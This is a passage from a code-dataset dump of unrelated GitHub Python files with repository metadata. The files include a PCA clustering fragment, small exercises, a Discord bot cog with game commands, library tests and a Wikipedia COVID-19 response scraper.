pca.components_.shape[0]\nmost_important = [np.abs(pca.components_[:][i]).argmax() for i in range(n_pcs)]\nprint(most_important)\n\n# In[37]:\n\n\"\"\"# number of components\nn_pcs= pca.components_.shape[0]\n\n# get the index of the most important feature on EACH component i.e. largest absolute value\n# using LIST COMPREHENSION HERE\nmost_important = [np.abs(pca.components_[:][i]).argmax() for i in range(n_pcs)]\ninitial_feature_names = ['0','1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30']\n\n# get the names\nmost_important_names = [initial_feature_names[most_important[i]] for i in range(n_pcs)]\n\n# using LIST COMPREHENSION HERE AGAIN\ndic = {'PC{}'.format(i+1): most_important_names[i] for i in range(n_pcs)}\n\n# build the dataframe\ndf = pd.DataFrame(sorted(dic.items()))\nprint(df)\"\"\"\n\n\n# In[38]:\n\n\ndef show_clusters(X,cluster):\n df=pd.DataFrame(dict(x=X[:,0],y=X[:,1], label=cluster))\n colors = {-1:'red',0:'blue',1:'orange',2:'green',3:'skyblue',4:'black',5:'purple'}\n fig,ax=plt.subplots(figsize=(8,8))\n grouped = df.groupby('label')\n \n for key, group in grouped:\n group.plot(ax=ax, kind='scatter',x='x',y='y',label=key ,color=colors[key])\n plt.xlabel(\"feature 0\")\n plt.ylabel(\"feature 1\")\n plt.show()\nshow_clusters(train_img,cluster)","repo_name":"IamMRM/Stimulating-States-of-Parkinsonian-Tremor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32661370469","text":"import sys\n\nn, m = map(int ,sys.stdin.readline().split())\nstart = 1\nresult = []\n\n# 1부터 시작하여 해당 숫자의 제곱수를 비교\nwhile start :\n # 만약 m을 넘어선 제곱수이면 루프문 탈출\n if start**2 > m :\n break\n \n # n이상 m이하의 제곱수이면 리스트에 추가\n if n <= start**2 <= m :\n result.append(start**2)\n \n start += 1\n\n# 제곱수 리스트 중 최소값과, 총 제곱수들의 합을 구함\nprint(result[0], sum(result))\n\n# https://level.goorm.io/exam/43116/%EC%99%84%EC%A0%84-%EC%A0%9C%EA%B3%B1%EC%88%98/quiz/1","repo_name":"KimHyungkeun/Algorithm","sub_path":"SWcodingTest/4day/완전제곱수.py","file_name":"완전제곱수.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71638895507","text":"'''\nTransform chain that provides polygons for shadows in an autocalibrated scene\n'''\n\nfrom aether.core import AetherTransformChain\n\nclass ShadowPolyChain(AetherTransformChain):\n\n\t#Transforms in this chain: names and their type\n\ttransforms={'camera':'CVMatPyGameSurface',\n\t 'cv_camera':'CVCamera',\n\t 'bgr2gray':'CVTColor',\n\t 'perspective':'CVPerspective',\n\t 'threshold':'CVThreshold',\n\t 'shadow':'ShadowPolys',\n\t 'invert':'CVInvert'\n\t }\n\n\t#Dependences from transform to transform, referenced by names defined in the 'transforms' field\n\ttransform_deps={'shadow':('threshold',),\n\t 'threshold':('invert',),\n\t 'invert':('perspective',),\n\t 'perspective':('bgr2gray',),\n\t 'bgr2gray':('cv_camera',)\n\t }\n\t#transform_deps={'shadow':('threshold',),'threshold':('perspective',),'perspective':('bgr2gray',),'bgr2gray':('cv_camera',)}\n\n\t#Defines the name of the start of the chain\n\t#This should be automatically calculated somehow\n\t#Possibly by building a graph of the deps, toplolgically sorting the graph, and taking the nodes that nothing depends on\n\t#For now this is explicitly defined\n\tstart='shadow'\n","repo_name":"lamielle/aether","sub_path":"src/aether/chain/ShadowPolyChain.py","file_name":"ShadowPolyChain.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30285247799","text":"# -- Write a python program that takes 10 fragments of 10 bases each from\n# -- the FRAT1 gene and sends them to two servers. The odd segments\n# -- (1,3,5,7 and 9) should be sent to server 1, and the even segments\n# -- (2,4,6,8 and 10) to server 2. The client should print on the console\n# -- all the fragments\n\nfrom Client0 import Client\nfrom Seq1 import Seq\n\nPRACTICE = 2\nEXERCISE = 7\n\nprint(f\"-----| Practice {PRACTICE}, Exercise {EXERCISE} |------\")\n\n# -- Parameters of the server to talk to\nIP = \"192.168.1.42\"\nPORT1 = 8080\nPORT2 = 8081\nc1 = Client(IP, PORT1)\nc2 = Client(IP, PORT2)\nprint(c1)\nprint(c2)\ns = Seq()\ns.read_fasta(\"../SESSION-04/FRAT1.txt\")\ns1 = str(s)\nmessage = \"Sending FRAT1 Gene to the server, in fragments of 10 bases...\"\n\n\ndef cutting_fragments(n1, n2, sqq1):\n string = \"\"\n for index in range(n1, n2):\n string = string + sqq1[index]\n return string\n\n\ndef list_fragments(k, sq1):\n list1 = []\n for index in range(1, k + 1):\n n1 = 10 * (index - 1)\n n2 = 10 * index\n a = cutting_fragments(n1, n2, sq1)\n list1.append(a)\n return list1\n\n\nnumber_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nlistfrags = list_fragments(10, s1)\neverything = dict(zip(number_list, listfrags))\nlistvalues = list(everything.values())\neven_list = [2, 4, 6, 8, 10]\nodd_list = [1, 3, 5, 7, 9]\nprint(f\"Gene FRAT1: {s1}\")\nfor key in everything:\n print(f\"Fragment {key}: {everything[key]}\")\n\nc1.talk(message)\nc2.talk(message)\n\nfor i in even_list:\n c2.talk(f\" Fragment {i}: {everything[i]}\")\nfor i in odd_list:\n c1.talk(f\" Fragment {i}: {everything[i]}\")\n","repo_name":"jorgefigveroa/2019-2020-PNE-Practices","sub_path":"P2/Ex7.py","file_name":"Ex7.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14522366975","text":"#---------------------------------------------------------------------#\n#IMPORTING THE MODULES\n#---------------------------------------------------------------------#\n\nfrom math import e\nfrom re import L\nfrom sys import platform\nimport discord\nimport sys\nimport enchant\nimport random\nimport string\nimport asyncio\nfrom discord import colour\nfrom discord import embeds\nfrom discord import widget\nfrom discord.embeds import Embed, EmptyEmbed\nfrom discord.ext import tasks, commands\nimport aiohttp\nimport datetime, time\nfrom discord.ext.commands import Bot, Cog, has_permissions, GameConverter, Converter\n#from discord.ext.commands.core import has_permissions\nfrom discord_components import DiscordComponents, Button, ButtonStyle, component\n#from discord.ext.commands.converter import GameConverter\nfrom PIL import Image, ImageFont, ImageDraw\nfrom io import BytesIO\n\nimport giphy_client\nfrom giphy_client.rest import ApiException\n\nfrom math import sqrt, pi\n\n#---------------------------------------------------------------------#\n#SETTING THE COG\n#---------------------------------------------------------------------#\n\nclass test_alox(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n#---------------------------------------------------------------------#\n#TEST COMMAND\n#---------------------------------------------------------------------#\n\n @commands.has_permissions(manage_messages=True)\n @commands.command()\n async def embed(self, ctx, *args):\n args = \" \".join(args[:])\n args = args.split(',')\n color = args[1]\n embedEmbed = discord.Embed(title = args[0], color = discord.Color.blue())\n print(args)\n length_args = (len(args)-2)//2\n for counter in range(0, length_args):\n embedEmbed.add_field(name = args[counter+2], value=args[counter+3])\n await ctx.send(embed=embedEmbed)\n\n\n\n#---------------------------------------------------------------------#\n#BOOP TEST COMMAND\n#---------------------------------------------------------------------#\n \n @commands.command()\n async def boop_test(self, ctx, user: discord.Member):\n search = \"boop\"\n api_key = self.client.GiphyKey\n api_instance = giphy_client.DefaultApi()\n\n try:\n\n api_response = api_instance.gifs_random_get(api_key, tag=search, rating=\"g\", fmt='json')\n gif = api_response.data.image_original_url\n\n embedBoop = discord.Embed(title=f'{ctx.author.name} boops {user.name}', color = 3447003)\n embedBoop.set_image(url=gif)\n embedBoop.set_footer(icon_url=ctx.author.avatar_url, text = f\"Requested by {ctx.author }\")\n\n await ctx.channel.send(embed=embedBoop)\n \n except ApiException as e:\n print(\"Exception when calling API for Giphy\")\n\n#---------------------------------------------------------------------#\n#TEST 2 COMMAND\n#---------------------------------------------------------------------#\n\n @commands.command()\n async def wordgame(self, ctx):\n random_container = ''\n channel = ctx.message.channel\n vowels = ['A', 'E', 'I', 'O', 'U']\n d = enchant.Dict(\"en_US\")\n \n for counter in range(3):\n random_container += random.choice(vowels)\n await ctx.send(f'Send a random word containing **{random_container}**')\n \n '''\n if check_word == True:\n else:\n '''\n def check(m): \n if m != None:\n check_word = d.check(m.content.lower())\n if random_container.lower() in m.content.lower() and check_word == True and m.author == ctx.author:\n return True\n else:\n return False\n else:\n ctx.channel.send('You didnt send anything!')\n try:\n msg = await self.client.wait_for('message', check=check, timeout=10)\n await channel.send(f'Correct {msg.content}!')\n except asyncio.TimeoutError:\n await ctx.send('You didnt respond in time!')\n except:\n print('You didnt do anything')\n\n#---------------------------------------------------------------------#\n#ADDING THE COG\n#---------------------------------------------------------------------#\n#hug, roast \n\n @commands.command()\n async def test(self, ctx, num : int):\n bar_start = \"<:barstart:870650383830229022>\"\n bar_middle = \"<:barmiddle:870650383293382707>\"\n bar_half = \"<:barhalf:870650383670837348>\"\n bar_mid = \"<:barmid:870690900685226046>\"\n bar_end = \"<:barend:870651709775560724>\"\n bar100end = \"<:bar100end:870693168650264586>\"\n num = 5 * round(num/5)\n main_num = num\n num = [int(a) for a in str(num)]\n if main_num == 95: \n await ctx.send(f\"{bar_start}{(bar_middle * 8)}{bar_half}\")\n elif str(num[1]) == str(5):\n remainder = (100 - main_num)-5 \n remainder = [int(a) for a in str(remainder)]\n #10, 40, 5, 5r, 40p\n await ctx.send(f\"{bar_start}{(bar_middle * (num[0]-1))}{bar_half}{(bar_mid * ((remainder[0])-1))}{bar_end}\")\n elif main_num == 100:\n await ctx.send(f\"{bar_start}{(bar_middle * 8)}{bar100end}\")\n else: \n remainder=(100 - main_num)\n remainder = [int(a) for a in str(remainder)]\n await ctx.send(f\"{bar_start}{(bar_middle * (num[0]-1))}{(bar_mid * ((remainder[0])-1))}{bar_end}\")\n\n @commands.command()\n async def test_cog(self, ctx):\n \n await ctx.send(list)\n\n#TEST COMMANDS\n\n @commands.command()\n async def test_rps(self, ctx, user : discord.Member):\n\n embedRPC = discord.Embed(title=\"Rock, Paper or Scissors\", description=\"Choose either one from the button shown below!\", color = 3447003)\n embedRPC.set_thumbnail(url=\"https://www.esquireme.com/public/styles/full_img/public/images/2017/05/29/rock_paper_scissors__2x.png?itok=7H3NxSxN\")\n\n embedNotHere = discord.Embed(title=f\"Rock, Paper or Scissors\", color = 3447003)\n embedNotHere.add_field(name=f\"{ctx.author.name}!\", value = f'```{ctx.author.name} did not react, or has exited!```', inline=False)\n embedNotHere.set_footer(icon_url=ctx.author.avatar_url, text=f\"Requested by {ctx.author}\")\n\n buttons = [\n Button(style = ButtonStyle.grey, label = \"Rock 🤘\", id = \"_rock\"),\n Button(style = ButtonStyle.red, label = \"Paper 📃\", id = \"_paper\"),\n Button(style = ButtonStyle.green, label = \"Scissors ✂\", id = \"_scissors\"),\n Button(style = ButtonStyle.red, label = \"Exit 🚪\", id = \"_exit\"),\n ]\n def disable_buttons():\n for t in buttons:\n t.style = ButtonStyle.grey\n t.disabled = True\n\n button_ids = [\"_rock\", \"_paper\", \"_scissors\", \"_exit\"]\n\n msg = await ctx.send(embed=embedRPC, components = [buttons])\n while True:\n try:\n global i\n res = await self.client.wait_for(\"button_click\", check=lambda i: i.component.id in button_ids and i.author.id == ctx.author.id or i.author.id == user.id and i.message.id == msg.id, timeout=10)\n global user_action\n\n if res.component.id == '_rock' == ctx.author.id:\n user_action = \"rock\"\n break\n\n elif res.component.id == '_paper':\n user_action = \"paper\"\n break\n\n elif res.component.id == '_scissors':\n user_action = \"scissors\"\n break\n\n elif res.component.id == '_exit':\n disable_buttons()\n await res.respond(embed=embedNotHere, components = [buttons], type = 7)\n user_action = None\n break\n\n except asyncio.TimeoutError:\n disable_buttons()\n #await res.respond(embed=embedNotHere, components = [buttons], type = 7)\n await msg.edit(embed=embedNotHere, components = [buttons])\n user_action = None\n break\n \n async def embedRPCWin(end):\n embedRPCWin = discord.Embed(title=\"Rock, Paper or Scissors\", description=f\"\"\"\n **CPU** vs **{ctx.author.name}**!\n \\n**CPU:** {computer_action.title()}\n **USER:** {user_action.title()}\n \"\"\", color = 3447003)\n embedRPCWin.add_field(name=f\"--------------------------------------------\", value = f'{end}' , inline=False)\n embedRPCWin.set_thumbnail(url=\"https://www.esquireme.com/public/styles/full_img/public/images/2017/05/29/rock_paper_scissors__2x.png?itok=7H3NxSxN\")\n disable_buttons()\n await res.respond(embed=embedRPCWin, components = [buttons], type=7)\n\n possible_actions = [\"rock\", \"paper\", \"scissors\"]\n computer_action = random.choice(possible_actions)\n global end\n if user_action == computer_action:\n end = (f\"```Both players selected {user_action}. It's a tie!```\")\n await embedRPCWin(end)\n elif user_action == \"rock\":\n if computer_action == \"scissors\":\n end = (\"```Rock smashes scissors! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Paper covers rock! You lose.```\")\n await embedRPCWin(end)\n elif user_action == \"paper\":\n if computer_action == \"rock\":\n end = (\"```Paper covers rock! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Scissors cuts paper! You lose.```\")\n await embedRPCWin(end)\n elif user_action == \"scissors\":\n if computer_action == \"paper\":\n end = (\"```Scissors cuts paper! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Rock smashes scissors! You lose.```\")\n await embedRPCWin(end)\n else:\n end = None\n pass\n\n @commands.command()\n async def test_embed(self, ctx):\n embedTest = discord.Embed(title=\"Test embed\", description=\"This is a test embed\", color = 0x2F3136 )\n await ctx.send(embed=embedTest)\n \ndef setup(client):\n client.add_cog(test_alox(client))","repo_name":"NPX2218/alox-bot","sub_path":"cogs/test_alox.py","file_name":"test_alox.py","file_ext":"py","file_size_in_byte":10417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42602071854","text":"#Faça um programa que peça 10 números inteiros, calcule e mostre a quantidade de números impares e de numeros pares\r\n\r\npar = impar = 0\r\n\r\nfor i in range (10):\r\n numero = int(input('Digite um número inteiro: '))\r\n if (numero % 2 == 0):\r\n par += 1\r\n else:\r\n impar += 1\r\nprint(f'Você digitou {par} números pares e {impar} números ímpares.')\r\n","repo_name":"zehzo/python-exercices","sub_path":"faculdade/monitoria - ex03.py","file_name":"monitoria - ex03.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44210689166","text":"from pointers import (\r\n to_c_ptr,\r\n TypedCPointer,\r\n StructPointer,\r\n localeconv,\r\n frexp,\r\n div,\r\n)\r\nfrom pointers._cstd import DivT\r\n\r\n\r\ndef test_to_c_ptr():\r\n ptr = to_c_ptr(5)\r\n assert type(ptr) is TypedCPointer\r\n # assert ~ptr == 5\r\n # ptr <<= 10\r\n # assert ~ptr == 10\r\n # for whatever reason, this only fails when testing. it works fine normally\r\n\r\n\r\ndef test_bindings():\r\n assert type(localeconv()) is StructPointer\r\n assert frexp(8.0, to_c_ptr(10)) == 0.5\r\n div_t = div(10, 1)\r\n assert type(div_t) is DivT\r\n assert div_t.quot is 10\r\n","repo_name":"simrit1/pointers.py","sub_path":"tests/test_binding.py","file_name":"test_binding.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"13144543590","text":"from os import PRIO_PGRP\nimport requests\nimport re\nimport ply.lex as lex\nimport ply.yacc as yacc\nfrom wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nprint(\"\\n\\nImporting World Response from january 2020 onwards\\n\")\nprint(\"This will take about 30 seconds\\n\\n\")\ndd = []\nmm = []\nyyyy = []\nNEWS = []\nall_dates = []\nall_news = []\n\nDD_final = []\nMM_final = []\nYYYY_final = []\nNEWS_final = []\nall_dates_final = []\nall_news_final = []\n\ndef sort():\n total_dates = len(dd)\n\n # on years \n # for i in range(total_dates-1):\n # for j in range(i+1, total_dates-1):\n # if int(mm[j]) < int(mm[i]) :\n\n # yyyy[j], yyyy[i] = yyyy[i], yyyy[j]\n # mm[j], mm[i] = mm[i], mm[j]\n # dd[j], dd[i] = dd[i], dd[j]\n # all_news[j], all_news[i] = all_news[i], all_news[j]\n # all_dates[j], all_dates[i] = all_dates[i], all_dates[j]\n\n # on years \n # for i in range(total_dates-1):\n # for j in range(0, total_dates-i-1):\n # if int(YYYY[j]) > int(YYYY[j + 1]) :\n\n # YYYY[j], YYYY[j + 1] = YYYY[j + 1], YYYY[j]\n # MM[j], MM[j + 1] = MM[j + 1], MM[j]\n # DD[j], DD[j + 1] = DD[j + 1], DD[j]\n # all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n # all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\n \n # # on months\n # for i in range(total_dates-1):\n # for j in range(0, total_dates-i-1):\n # if int(MM[j]) > int(MM[j + 1]) :\n\n # YYYY[j], YYYY[j + 1] = YYYY[j + 1], YYYY[j]\n # MM[j], MM[j + 1] = MM[j + 1], MM[j]\n # DD[j], DD[j + 1] = DD[j + 1], DD[j]\n # all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n # all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\n # on date\n for i in range(total_dates-1):\n for j in range(0, total_dates-i-1):\n if int(dd[j]) > int(dd[j + 1]) :\n\n yyyy[j], yyyy[j + 1] = yyyy[j + 1], yyyy[j]\n mm[j], mm[j + 1] = mm[j + 1], mm[j]\n dd[j], dd[j + 1] = dd[j + 1], dd[j]\n all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\ndef month_formate(month_str):\n\n if month_str == 'January':\n return '01'\n\n if month_str == 'February':\n return '02'\n\n if month_str == 'March':\n return '03'\n\n if month_str == 'April':\n return '04'\n\n if month_str == 'May':\n return '05'\n\n if month_str == 'June':\n return '06'\n\n if month_str == 'July':\n return '07'\n\n if month_str == 'August':\n return '08'\n\n if month_str == 'September':\n return '09'\n\n if month_str == 'October':\n return '10'\n\n if month_str == 'November':\n return '11'\n\n if month_str == 'December':\n return '12'\n\ndef chnage_month(month):\n\n if month == '01':\n return'January'\n\n if month == '02':\n return'February'\n\n if month == '03':\n return'March'\n\n if month == \"04\":\n return 'April'\n\n if month == '05':\n return'May'\n\n if month == '06':\n return 'June'\n\n if month == '07':\n return 'July'\n\n if month == '08':\n return 'August'\n\n if month == '09':\n return 'September'\n\n if month == '10':\n return 'October'\n\n if month == '11':\n return'November'\n\n if month == '12':\n return 'December'\n\n\n\nmain_url='https://en.wikipedia.org/wiki/Responses_to_the_COVID-19_pandemic_in_'\n\nmonths = ['January_2020', 'February_2020', 'March_2020', 'April_2020',\n 'May_2020', 'June_2020', 'July_2020', 'August_2020', 'September_2020',\n 'October_2020', 'November_2020', 'December_2020', 'January_2021', 'February_2021',\n 'March_2021', 'April_2021', 'May_2021', 'June_2021', 'July_2021',\n 'August_2021', 'September_2021', 'October_2021', 'November_2021', 'December_2021',\n 'January_2022', 'February_2022','March_2022']\n\n# months = ['January_2020', 'February_2020']\n\ntotal_months = len(months)\n\ntokens = ['DATE_ANCHOR', 'DATE', 'NEWS_LIST','STOP_POINT']\n\ndef t_STOP_POINT(t):\n r'

'\n return t\n\ndef t_DATE_ANCHOR(t):\n r'\\d{1,2}\\s\\w{3,9}<'\n return t\n\ndef t_NEWS_LIST(t):\n r'((
  • .+
  • \\s*)+|(

    .+\\s

    \\n